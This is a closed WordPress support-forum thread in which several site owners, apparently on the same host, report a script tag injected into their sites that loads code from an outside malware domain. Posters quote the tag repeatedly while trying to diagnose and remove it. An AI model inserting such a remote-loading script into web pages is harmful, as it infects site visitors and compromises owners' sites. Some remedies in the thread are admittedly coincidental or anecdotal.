I just upgraded to the newest version of wordpress and on my pages I am seeing this code.....
<script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script>
any idea what this is and what it effects or how to get rid of it?
[closed] I did the updrage to the latest version now I have some strange code. (80 posts)
-
jasonc2
Posted 2 years ago #
-
Jonas Grumby
Posted 2 years ago #
Try switching to the default theme and deactivating all plugins. What is the URL of the site? If I go to http://infoitpoweringgathering.com/ I get a blank page.
-
Have you tried:
- deactivating all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s).
- switching to the Twenty Ten theme to rule out any theme-specific problems.
- resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.
-
Posted 2 years ago #
The url for my site is http://www.forgednc.com the code doesn't show up on the site but in the backend when I view the site.
I get a blank page when I go to http://infoitpoweringgathering.com/ as well that is why I can't tell wtf it is.
Not sure how to reset the plugins. But can try the deactivating.
-
Posted 2 years ago #
If you have a good code editing program with "advanced search" you can download all of the files from your site and find out which one has that link to infoitpoweringgathering.com in it. You have a custom theme, so is that some reference to your theme developer? Try the things esmi suggested. "resetting the plugins folder" can be done by renaming the old one and creating a new one via FTP.
-
lyricandariasmom
Posted 2 years ago #
I have the same thing ... I go to my dashboard and see <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script> in the quickpress section in the contents area. I can't delete it for anything, trying to find out what it is, how to get rid of it, seeing if my host knows anything or can help...
I have no idea what i'm doing... Or what that is?! I didn't upload or install anything new lately, and that infoitpoweringgathering.com has nothing to do with my site, developer or host...
-
Posted 2 years ago #
Your sites may have been hacked. Are you running a firewall?
-
Posted 2 years ago #
I'm not really sure why they released Firewall2 as a new plugin rather than as a new version of the original plugin, but there it is.
-
Posted 2 years ago #
Thanks Jonas, I didn't have one installed but I do now... Now just to figure out WTF is going on with this script code and how to get rid of it!
-
Posted 2 years ago #
Interesting... Installed that firewall now the script code is gone...
THANKS! -
Posted 2 years ago #
You're welcome.
-
Posted 2 years ago #
HA! Just an update, it was a coincidence that the firewall did anything, just heard from my host and I was hacked - virus attack they said.. To the OP contact your host!
-
Posted 2 years ago #
I just installed the firewall and the script is still there. Ok so I will try to contact my host to see if it is a virus. Is there a virus remover for a website?
-
Posted 2 years ago #
No idea... My host fixed the issue... just out of curiosity, who's your host Jason? Mine is ipower
-
Posted 2 years ago #
I am on ipower as well. Did you contact them or did they contact you?
-
Posted 2 years ago #
I contacted them..
-
Posted 2 years ago #
Well, glad you got it sorted but you should still run a firewall and one or two other security plugins.
-
Posted 2 years ago #
Yeah I loaded the firewall too. Didn't know that was necessary. I thought the hosting provider would handle that.
-
Posted 2 years ago #
Had no idea, so thanks Jonas.. What other security plugins do you recommend?
-
sanshik
Posted 2 years ago #
i have the same problem guys, i run different wordpress blogs in my host and all of theme got infected with this male-ware code, i am also hosting my sites with ipower.com and the tech guys did not seem to have a solution yet, please if any one of you has solved this problem, show me how to do the same step by step, i have already installed firewall plugin but nothing changed.
this male-ware code seems to be new, the domain name it promotes is only one day old yet and it it's servers are in lativa. -
Posted 2 years ago #
Well, they solved my problem, got rid of all the malware and took ALL of my blog posts and backups with it...
I now have a BLANK blog, 3 years of posts GONE (yes I know stupid me for not having a backup on my computer), so before you loose everything make sure you have a backup. I did nothing, they took care of the situation.
-
Posted 2 years ago #
when i first told theme about this problem i asked to not take any action before the make sure i will not lose any data, then i started to backup all my sites, even i think the male-ware is still hidden in the backup itself, but i hope to find a solution without removing my site
-
Posted 2 years ago #
So i have contacted Ipower and so far they have no idea. They tell me they can't scan the site for me and that I will have to do it. If I freaking knew how to do that I wouldn't need them. They should have things in place to prevent this type of attack anyway shouldn't they?
-
Posted 2 years ago #
i think the male-ware code came from their servers, all infected sites seems to be only with ipower
-
Posted 2 years ago #
No idea?? I'm sure they have SOME idea since it seems like it's their servers that got effected since it's more than just 1 of us finding this out now...
Here's what they originally told me:
We have found some SQL injection codes from your database and we have removed it. We suggest you to upload clean copy of your database back up from your local system.Yea, they just removed EVERYTHING though so beware.... If your not getting online support CALL THEM!
-
Posted 2 years ago #
I highly suggest if you have facebook to let IPOWER know whats going on on their page, I'm getting more help there than their support http://www.facebook.com/#!/ipower
-
Posted 2 years ago #
Just did it. Great idea. Thanks.
-
raul.escamilla
Posted 2 years ago #
coincidence? I do not think I've had this problem twice with PowWeb, ipower sister company, and since one day I have exactly the same attack on one of my wordpress web sites hosted on IPOWER.
-
GracelandWest
Posted 2 years ago #
My client's site is another IPOWER hosted site with the <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script> script in the QuickPress section.
I opened up a page on the site and AVG popped up a malware warning. Here are the details.
"5/17/2011, 3:21:14 PM";"NT AUTHORITY\SYSTEM";"IDP";"Process OS_PACK107_2129[1].EXE was detected."
I've been on the phone with IPOWER support with no success. I'll post if I find a solution.
-
davidallred
Posted 2 years ago #
I am with Ipower as well. So obviously their databases have been hacked somehow. I also installed the firewall and <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script> is still there. It happened on all of my WP blogs I am hosting, which is about 6 or so.
Topic Closed
This topic has been closed to new replies.
